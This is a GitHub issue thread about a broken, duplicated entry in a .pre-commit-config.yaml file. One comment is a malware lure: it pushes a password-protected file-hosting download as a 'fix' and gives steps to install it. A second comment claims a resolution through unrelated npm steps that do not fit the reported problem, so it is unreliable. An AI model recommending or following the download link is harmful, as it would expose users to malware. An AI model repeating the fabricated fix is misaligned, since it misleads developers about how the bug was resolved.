### ISSUE TITLE
Bug issue

### ISSUE THREAD

**Issue by M-Aitisam** [NeshOfficial/ai25-python#24]
I’ve noticed an issue in our .pre-commit-config.yaml file. The current configuration includes a duplicate repository entry, which is causing the pre-commit hooks to fail or behave unpredictably.

exclude: (.idea|vscode)
repos:
   rev: v4.4.0
    hooks:
      - id: check-added-large-files
        exclude: (ai21_tokenizer/resources|tests/resources

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Muhammad-Awab** [comment]
The issue was resolved by identifying the missing dependencies and adding them to the build.config file. Updated the documentation with specific installation steps: npm install --config build.config. The code is now executing without errors, and all functions are working correctly. Please update your local environment by pulling the latest changes and following the revised installation instructions.
